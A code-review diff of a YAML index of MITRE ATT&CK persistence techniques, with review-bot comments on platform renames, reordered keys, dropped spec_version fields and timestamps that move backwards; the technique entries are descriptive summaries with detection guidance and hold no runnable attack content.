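Review bot: the platform list for T1078 drops 'Azure AD', 'Office 365' and 'Google Workspace' and adds 'Office Suite' and 'Identity Provider'; anything keyed on the old platform strings (per-platform indexes, filters, matrices) will no longer match this technique unless it is regenerated in the same change, so the regenerated artifacts should ship alongside this file, and the bump to version 2.7 should be described as a platform rename rather than a content change.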
@@ -33512,11 +33923,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33545,24 +33957,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -33597,9 +34011,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -33659,7 +34070,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33684,13 +34095,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -33743,8 +34152,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -33792,78 +34201,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -33911,6 +34253,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -33921,9 +34267,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -33932,8 +34282,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
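Review bot: the only substantive change in the re-emitted T1546.004 reference list is the `bencane blog bashrc` entry, whose url now points at a web.archive.org snapshot (20220316014323) of the original bencane.com post and whose retrieval date moves to September 25, 2024; everything else is the same set of references in a different order. Worth stating in the commit message that a dead link was replaced with an archive copy, since the ordering churn otherwise hides it. The `x_mitre_permissions_required` list (User, Administrator) is retained here, unlike T1137.003 above.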
@@ -33970,7 +34379,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -33993,12 +34402,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
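Review bot: T1547.002 keeps `x_mitre_attack_spec_version: 2.1.0` while its `spec_version: '2.1'` line is removed, leaving it on an older attack-spec version than the objects bumped to 3.2.0 elsewhere in this diff; together with its `modified` date moving backwards in the previous hunk, this suggests the source object for T1547.002 was not refreshed. Either refresh it from the same upstream bundle as the others or confirm that mixed attack-spec versions are acceptable to the consumers of this file.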
@@ -34076,41 +34484,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -34119,27 +34497,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
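Review bot: most of this hunk is a key reorder rather than a content change, and that is worth stating up front because it cannot be told from the diff at this size: `type`, `id`, `created`, `created_by_ref`, `external_references` and `object_marking_refs` for T1137.004 are re-emitted at the bottom with the same values the preceding hunk removed from the top, and each reference now has its keys in source_name/description/url order. The edits that actually alter the object are `x_mitre_version` 1.1 → 1.2, `x_mitre_platforms` gaining `Office Suite`, `x_mitre_deprecated: false` and `revoked: false` appearing, `x_mitre_permissions_required` going away and `x_mitre_attack_spec_version` 2.1.0 → 3.2.0. Separately, the T1574.009 `modified` stamp at the end of the hunk moves backwards (`2023-05-09T14:00:00.188Z` → `2023-03-30T21:01:35.788Z`), and the same backwards move recurs for a dozen techniques below, always from a `14:00:00.188Z` value; that suggests the old stamps were synthetic rather than upstream, so anything that treats `modified` as monotonic to detect updates will skip these objects. Sorting keys in the generator would let future regenerations diff cleanly.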
@@ -34200,7 +34605,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
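Review bot: `spec_version: '2.1'` is dropped here for T1574.009 and, further down, for every other regenerated technique. STIX 2.1 makes `spec_version` a required common property on each domain object, so if any consumer validates or re-bundles these technique objects as STIX 2.1 this will start failing; if the index is only read as YAML and the retained `x_mitre_attack_spec_version` is what matters, say so where the generator is documented.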
@@ -34244,7 +34648,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -34266,7 +34670,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -34347,7 +34750,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
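Review bot: T1078.002 has no `identifier:` line between `x_mitre_modified_by_ref` and `atomic_tests`, while the neighbouring T1574.009 and T1037.005 entries carry one. It is absent on both the old and the new side, so this patch did not introduce the gap, but since the generator output is being reshaped anyway, emitting `identifier` for every technique would let consumers stop inferring it from the parent key.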
@@ -34370,7 +34772,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -34400,12 +34802,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
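Review bot: for T1037.003 this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, leaving the entry with no attack spec version at all, whereas the other regenerated entries keep or bump `x_mitre_attack_spec_version`. Its `modified` stamp also went back to `2020-03-24T23:45:25.625Z` in the hunk above, so this most likely reflects the upstream object predating the field rather than a generator bug, but consumers that read `x_mitre_attack_spec_version` unconditionally will now hit a missing key for T1037.003 (and for T1037.001, which gets the same treatment later in the patch).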
@@ -34495,12 +34895,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34585,7 +34984,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -34650,18 +35048,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34694,10 +35091,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
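Review bot: the platform list for T1556.009 loses `SaaS` as well as `Azure AD`, ending up as `IaaS` plus `Identity Provider`. The `Azure AD` → `Identity Provider` substitution is the same mapping applied elsewhere in this patch, but removing `SaaS` is a scope change that the description (Entra ID, Okta, JumpCloud) does not obviously motivate; confirm it matches the upstream object at `x_mitre_version` 1.1 rather than being a mapping-table side effect, because per-platform filters over this index will stop returning Conditional Access Policies for SaaS.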
@@ -34734,7 +35130,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -34808,7 +35203,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34836,12 +35231,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -34900,33 +35294,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34947,6 +35318,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -34961,52 +35333,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
